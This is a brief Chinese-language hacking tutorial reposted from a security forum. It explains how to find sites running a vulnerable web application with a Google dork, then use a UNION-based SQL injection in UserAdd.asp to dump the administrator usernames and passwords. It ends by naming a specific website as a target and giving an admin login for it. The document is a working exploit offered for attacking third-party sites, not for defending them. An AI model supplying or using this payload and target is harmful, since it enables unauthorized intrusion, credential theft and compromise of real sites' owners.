虽然这个纯文字教程,但是这个漏洞很简单,相信大家一看就会的!
在google里输入关键字:inurl:Seamar.asp
找到网站打开注册用户页面UserReg.asp
比如网站地址为www.123.com 则打开
注册后输入以下代码(是在网址的后面)
UserAdd.asp?Result=Modify&ID=161 and 1=2 union select 1,2,3,4,adminname,password,7,8,9,10,11,12,13,14,15,16 from zhi_rui_s_manage
比如www.123.com/代码
回车,直接爆出管理用户和密码。
附送一个站吧!
http://www.zhisuo.net 后台自己去找下吧!
账号admin 密码123456
本文来源:落雪网安
原文地址:http://www.hack1994.com/thread-896-1-1.html 转载请说明版权,谢谢您的支持
